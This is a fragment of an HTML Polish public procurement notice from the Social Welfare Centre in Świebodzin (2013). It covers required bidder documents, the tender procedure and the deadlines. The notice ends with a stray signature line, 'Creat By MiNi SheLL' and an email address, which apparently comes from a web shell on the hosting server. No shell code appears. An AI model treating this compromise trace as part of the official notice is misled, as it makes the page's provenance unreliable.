<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2;
2.Oświadczenie Wykonawcy, że:
-podlega stałemu nadzorowi Państwowej Inspekcji Sanitarnej lub Inspekcji Weterynaryjnej, zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywieniu (Dz. U z 2010 r. Nr 136, poz. 914 z późn. zm.),
-posiada aktualne zezwolenie właściwego Powiatowego Lekarza Weterynarii na prowadzenie usług transportowych w zakresie przewozu żywności pochodzenia zwierzęcego - zgodnie z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127 z późn.zm.) lub aktualne zezwolenie Państwowego Inspektora Sanitarnego na prowadzenie usług transportowych w zakresie przewozu żywności - zgodnie z ustawą z dnia 25 sierpnia 2006 r.  o bezpieczeństwie żywności i żywieniu (Dz. U. z 2010 r. Nr 136, poz. 914 z późn.zm.),
-posiada wdrożony  i stosuje system HACCAP - załącznik nr 3;
3.Oświadczenie wykonawcy o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych  - załącznik nr 4;
4.Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 z późn. zm.) albo informacja o tym, że nie należy do grupy kapitałowej - załącznik nr 6.
5.Pełnomocnictwo do podpisana oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. Pełnomocnictwo winno być złożone  w formie oryginału lub kopii poświadczonej notarialnie.
6. Formularz/e ofertowy/e</p><p><b>III.7)</b><p>
<p><b>ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne</b> - należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach </p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy wraz z określeniem warunków takich zmian zawarta jest we wzorach umowy stanowiących załącznik nr 7-1 (Zadanie 1), załącznik nr 7-2 (Zadanie 2), załącznik nr 7-3 (Zadanie 3), załącznik nr 7-4 (Zadanie 4), załącznik nr 7-5 (Zadanie 5), załącznik nr 7-6 (Zadanie 6), załącznik nr 7-7 (Zadanie 7), załącznik nr 7-8 (Zadanie 8), załącznik nr 7-9 (Zadanie 9) do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/ops_swiebodzin<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Świebodzinie plac Wolności 14, 66-200 Świebodzin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej w Świebodzinie plac Wolności 14, 66-200 Świebodzin sekretariat - I piętro pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com